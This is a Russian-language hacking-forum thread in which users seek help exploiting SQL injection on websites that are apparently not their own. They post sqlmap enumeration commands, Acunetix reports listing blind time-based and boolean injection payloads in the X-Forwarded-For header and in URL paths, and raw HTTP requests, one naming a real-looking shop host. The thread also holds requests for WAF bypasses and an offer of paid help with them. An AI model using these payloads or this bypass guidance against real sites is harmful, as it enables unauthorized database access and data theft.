ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

02.04.2020, 16:12
|
|
Новичок
Регистрация: 19.09.2011
Сообщений: 12
Провел на форуме: 3970
Репутация:
0
|
|
Доброго времени всем. При таком запросе:
sqlmap.py --random-agent -u " https://www.site.com" --dbs --keep-alive
Получаю название бд. Дальше при такой команде:
sqlmap.py --random-agent -u " https://www.site.com" target url -D dbname --tables
Получаю следующее:
.SpoilerTarget" type="button">Spoiler: Скриншот
Пробовал напрямую делать запрос:
sqlmap.py --random-agent -u " https://site.com" target url -D dbname -T user --columns
Такая же ошибка
Я так понимаю дело в этом?
Подскажите пожалуйста, какие команды можно попробовать? Что можно сделать?
Структура движка мне знакома. Исходя из этого, названия таблиц и колонок я предположительно знаю.
P.s
Если у кого есть свободное время, и опыт в обходе WAF, просьба написать в лс.
Есть предложение на взаимовыгодных условиях.
|
|
|

02.04.2020, 18:49
|
|
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
Провел на форуме: 61136
Репутация:
32
|
|
Сообщение от hashfinderboss
↑
я знаю что есть ерор,унион,болеан,таймбасе ,стэйкед,инлине а как выглядит UPDATE?
UPDATE, это оператор который обновляет столбцы в базе данных.
mysql.ru/docs/man/UPDATE.html
Сообщение от hashfinderboss
↑
как проверить UPDATE или нет?
Если выполнить вывод из той же таблицы в которую гипотетически идет обновление строк, MySQL выбьет ошибку Can't specify target table for update in FROM clause
|
|
|

02.04.2020, 20:56
|
|
Новичок
Регистрация: 19.09.2011
Сообщений: 12
Провел на форуме: 3970
Репутация:
0
|
|
Застрял на этом моменте:
Подскажите, что делать дальше?
|
|
|

05.04.2020, 23:07
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме: 96779
Репутация:
5
|
|
Сообщение от mixer123
↑
Застрял на этом моменте:

Подскажите, что делать дальше?
Искать тамперы
|
|
|

22.04.2020, 23:29
|
|
Новичок
Регистрация: 29.10.2017
Сообщений: 6
Провел на форуме: 1085
Репутация:
0
|
|
Как эксплуатировать найденые уязвимости акунетикс в sqlmap?помогите разобраться
например это?
The vulnerability affects https://site.com/product/11/HP-4250N...inter-LIKE-NEW , X-Forwarded-For
Discovered by Blind SQL Injection
Attack Details
arrow_drop_up
HTTP Header input X-Forwarded-For was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Tests performed:
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 20.152
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.489
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.599
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.906
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.474
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.489
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.479
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.852
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.218
Original value: 3iv1i
HTTP Request
arrow_drop_up
GET /product/11/HP-4250N-LaserJet-Printer-LIKE-NEW HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Cookie: PHPSESSID=nfek80so1e2bn7p6st0503aro0
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: copyfaxes.com
Connection: Keep-alive
|
|
|

22.04.2020, 23:30
|
|
Новичок
Регистрация: 29.10.2017
Сообщений: 6
Провел на форуме: 1085
Репутация:
0
|
|
Сообщение от rozzet
↑
Как эксплуатировать найденые уязвимости акунетикс в sqlmap?помогите разобраться
например это?
The vulnerability affects
https://site.com/product/11/HP-4250N...inter-LIKE-NEW
, X-Forwarded-For
Discovered by Blind SQL Injection
Attack Details
arrow_drop_up
HTTP Header input X-Forwarded-For was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Tests performed:
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 20.152
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.489
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.599
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.906
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.474
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.489
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.479
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.852
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.218
Original value: 3iv1i
HTTP Request
arrow_drop_up
GET /product/11/HP-4250N-LaserJet-Printer-LIKE-NEW HTTP/1.1
Referer:
https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Cookie: PHPSESSID=nfek80so1e2bn7p6st0503aro0
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: copyfaxes.com
Connection: Keep-alive
и это например?буду предельно благодарен за помощь.
The vulnerability affects https://www.site.com/ , /--[*]-.html
Discovered by Blind SQL Injection
Attack Details
arrow_drop_up
Path Fragment input /--[*]-.html was set to volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL
Tests performed:
volts-amplifier-and-cd-players' AND 2*3*8=6*8 AND '000iUNL'='000iUNL => TRUE
volts-amplifier-and-cd-players' AND 2*3*8=6*9 AND '000iUNL'='000iUNL => FALSE
volts-amplifier-and-cd-players' AND 3*3 FALSE
volts-amplifier-and-cd-players' AND 3*2>(1*5) AND '000iUNL'='000iUNL => TRUE
volts-amplifier-and-cd-players' AND 3*2*0>=0 AND '000iUNL'='000iUNL => TRUE
volts-amplifier-and-cd-players' AND 3*3*9 FALSE
volts-amplifier-and-cd-players' AND 5*4=20 AND '000iUNL'='000iUNL => TRUE
volts-amplifier-and-cd-players' AND 5*4=21 AND '000iUNL'='000iUNL => FALSE
volts-amplifier-and-cd-players' AND 5*6 FALSE
volts-amplifier-and-cd-players' AND 7*7>48 AND '000iUNL'='000iUNL => TRUE
volts-amplifier-and-cd-players' AND 3*2*0=6 AND '000iUNL'='000iUNL => FALSE
volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL => TRUE
Original value: volts-amplifier-and-cd-players
HTTP Request
arrow_drop_up
GET /search-110-volts-amplifier-and-cd-players'%20AND%203*2*1=6%20AND%20'000iUNL'='000iUN L-1517.html HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.site.com/
Cookie: PHPSESSID=jbf01bl7tu9q5j81f3mui12mof
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.site.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
|
|
|

27.04.2020, 00:13
|
|
Новичок
Регистрация: 05.12.2018
Сообщений: 16
Провел на форуме: 6200
Репутация:
0
|
|
Всем привет. Acunetix выдал такое:
Код:
Уязвимость затрагивает https://www.site.com/ , / / /[*] / /
Обнаружено слепым SQL-инъекцией
Детали атаки
arrow_drop_up
Вход фрагмента пути / / /[*] / / был установлен в 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z Выполнены
тесты :
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.294
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.29
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,283
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.29
0'XOR (if (now () = sysdate (), sleep (3), 0)) XOR'Z => 3.255
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,286
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.314
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.252
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,31
Первоначальное значение: doe-spiransuchor
HTTP-запрос
arrow_drop_up
GET / spaelet / ubonteutr / 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z /
Как правильно скормить в sqlmap?
|
|
|

27.04.2020, 01:34
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме: 96779
Репутация:
5
|
|
Сообщение от vladF
↑
Всем привет. Acunetix выдал такое:
Код:
Уязвимость затрагивает https://www.site.com/ , / / /[*] / /
Обнаружено слепым SQL-инъекцией
Детали атаки
arrow_drop_up
Вход фрагмента пути / / /[*] / / был установлен в 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z Выполнены
тесты :
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.294
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.29
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,283
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.29
0'XOR (if (now () = sysdate (), sleep (3), 0)) XOR'Z => 3.255
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,286
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.314
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.252
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,31
Первоначальное значение: doe-spiransuchor
HTTP-запрос
arrow_drop_up
GET / spaelet / ubonteutr / 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z /
Как правильно скормить в sqlmap?
Точно так же как написали выше, со слепыми может быть ложное срабатывание
|
|
|

27.04.2020, 02:07
|
|
Новичок
Регистрация: 05.12.2018
Сообщений: 16
Провел на форуме: 6200
Репутация:
0
|
|
Сообщение от karkajoi
↑
Точно так же как написали выше, со слепыми может быть ложное срабатывание
Двумя сканерами проверил,не должна быть ложная
|
|
|

30.04.2020, 11:48
|
|
Новичок
Регистрация: 30.04.2020
Сообщений: 3
Провел на форуме: 1154
Репутация:
0
|
|
Можно ли обойти WAF который блокирует все запросы POST, GET, в которых содержится "select*from", "update*set","delete*from" регистро-независимо?
Не совсем понятно на каком уровне проходит WAF, но urlencode блокируется.
back-end DBMS: MySQL >= 5.0.0
banner: '5.7.26-log'
server: Apache/2.2.15 (CentOS)
x-powered-by: PHP/5.3.3
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|